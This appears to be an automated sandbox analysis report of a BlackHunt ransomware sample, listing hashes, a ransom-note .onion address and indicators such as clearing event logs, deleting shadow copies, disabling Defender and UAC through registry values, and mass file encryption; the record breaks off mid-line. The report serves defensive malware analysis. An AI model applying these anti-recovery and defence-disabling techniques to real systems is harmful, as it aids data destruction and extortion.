Analysis
-
max time kernel
165s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:56
Static task
static1
Behavioral task
behavioral1
Sample
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe
Resource
win10v2004-20231215-en
General
-
Target
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe
-
Size
707KB
-
MD5
51d9ae8d5ef9385579d3461c91a91a6a
-
SHA1
60cabd8495d2cc0f73d68f3fa714ccc49a0db510
-
SHA256
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28
-
SHA512
a6d45bc3579ab9723c4229f5488a2f2b3af9e9a6c1f468196e4d83d6e988f428ccde96c7e990d00507d68bfd850a265dd89b85692731ed6ceeb383daab2c3aa2
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Ivnh:6uaTmkZJ+naie5OTamgEoKxLWE2h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5580 fsutil.exe 2236 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2728 wevtutil.exe 2452 wevtutil.exe 5956 wevtutil.exe 2872 wevtutil.exe 3964 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5932 bcdedit.exe 5952 bcdedit.exe 1932 bcdedit.exe 2660 bcdedit.exe -
Renames multiple (335) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 4696 wbadmin.exe 5180 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\L: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\A: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\H: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\E: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\J: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\U: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\I: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\P: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\Z: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\B: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\T: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\Y: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\X: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\O: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\K: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\N: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\G: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\Q: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\R: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\V: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\M: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\lib\ir.idl cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\License.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\icu.md cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\CIEXYZ.pf cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\MSBuild\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\management.properties cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\MSBuild\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management-agent.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\public_suffix.md cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\dotnet\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxml2.md cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightItalic.ttf cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\README.html cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\java.security cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklist cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ja.properties cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\ct.sym cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterRegular.ttf cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cryptix.md cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\dotnet\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\descript.ion cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.cpl cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jvm.lib cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\jpeg_fx.md cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\LICENSE cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\pkcs11cryptotoken.md cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5820 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5980 vssadmin.exe 5972 vssadmin.exe 352 vssadmin.exe 5964 vssadmin.exe 5956 vssadmin.exe 5984 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1376 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3244 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeRestorePrivilege 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeBackupPrivilege 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeTakeOwnershipPrivilege 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeAuditPrivilege 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeSecurityPrivilege 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeIncBasePriorityPrivilege 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeBackupPrivilege 5268 wbengine.exe Token: SeRestorePrivilege 5268 wbengine.exe Token: SeSecurityPrivilege 5268 wbengine.exe Token: SeBackupPrivilege 5444 vssvc.exe Token: SeRestorePrivilege 5444 vssvc.exe Token: SeAuditPrivilege 5444 vssvc.exe Token: SeSecurityPrivilege 2452 wevtutil.exe Token: SeBackupPrivilege 2452 wevtutil.exe Token: SeSecurityPrivilege 2872 wevtutil.exe Token: SeBackupPrivilege 2872 wevtutil.exe Token: SeSecurityPrivilege 2728 wevtutil.exe Token: SeBackupPrivilege 2728 wevtutil.exe Token: SeSecurityPrivilege 5956 wevtutil.exe Token: SeBackupPrivilege 5956 wevtutil.exe Token: SeSecurityPrivilege 3964 wevtutil.exe Token: SeBackupPrivilege 3964 wevtutil.exe Token: SeDebugPrivilege 1376 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2364 wrote to memory of 4016 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 92 PID 2364 wrote to memory of 4016 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 92 PID 2364 wrote to memory of 4116 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 94 PID 2364 wrote to memory of 4116 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 94 PID 2364 wrote to memory of 3964 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 96 PID 2364 wrote to memory of 3964 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 96 PID 2364 wrote to memory of 2536 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 175 PID 2364 wrote to memory of 2536 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 175 PID 2364 wrote to memory of 5092 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 198 PID 2364 wrote to memory of 5092 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 198 PID 5092 wrote to memory of 2184 5092 Conhost.exe 103 PID 5092 wrote to memory of 2184 5092 Conhost.exe 103 PID 4016 wrote to memory of 3200 4016 cmd.exe 171 PID 4016 wrote to memory of 3200 4016 cmd.exe 171 PID 4116 wrote to memory of 768 4116 cmd.exe 107 PID 4116 wrote to memory of 768 4116 cmd.exe 107 PID 2364 wrote to memory of 1416 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 105 PID 2364 wrote to memory of 1416 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 105 PID 2364 wrote to memory of 1600 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 108 PID 2364 wrote to memory of 1600 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 108 PID 2536 wrote to memory of 2684 2536 cmd.exe 166 PID 2536 wrote to memory of 2684 2536 cmd.exe 166 PID 3964 wrote to memory of 1068 3964 cmd.exe 104 PID 3964 wrote to memory of 1068 3964 cmd.exe 104 PID 2364 wrote to memory of 4296 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 110 PID 2364 wrote to memory of 4296 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 110 PID 2364 wrote to memory of 3988 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 114 PID 2364 wrote to memory of 3988 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 114 PID 2364 wrote to memory of 1112 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 116 PID 2364 wrote to memory of 1112 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 116 PID 2364 wrote to memory of 1252 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 117 PID 2364 wrote to memory of 1252 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 117 PID 2364 wrote to memory of 4288 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 121 PID 2364 wrote to memory of 4288 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 121 PID 2364 wrote to memory of 456 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 119 PID 2364 wrote to memory of 456 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 119 PID 2364 wrote to memory of 2648 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 137 PID 2364 wrote to memory of 2648 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 137 PID 2364 wrote to memory of 3312 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 135 PID 2364 wrote to memory of 3312 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 135 PID 2364 wrote to memory of 4128 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 133 PID 2364 wrote to memory of 4128 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 133 PID 2364 wrote to memory of 2044 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 124 PID 2364 wrote to memory of 2044 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 124 PID 2364 wrote to memory of 1508 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 127 PID 2364 wrote to memory of 1508 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 127 PID 2364 wrote to memory of 60 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 129 PID 2364 wrote to memory of 60 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 129 PID 2364 wrote to memory of 4524 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 131 PID 2364 wrote to memory of 4524 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 131 PID 2364 wrote to memory of 1256 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 136 PID 2364 wrote to memory of 1256 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 136 PID 2364 wrote to memory of 3492 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 138 PID 2364 wrote to memory of 3492 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 138 PID 2364 wrote to memory of 2452 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 141 PID 2364 wrote to memory of 2452 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 141 PID 2364 wrote to memory of 4348 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 140 PID 2364 wrote to memory of 4348 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 140 PID 2364 wrote to memory of 832 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 144 PID 2364 wrote to memory of 832 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 144 PID 2364 wrote to memory of 4320 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 146 PID 2364 wrote to memory of 4320 2364 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 146 PID 2364 wrote to memory of 3256 2364 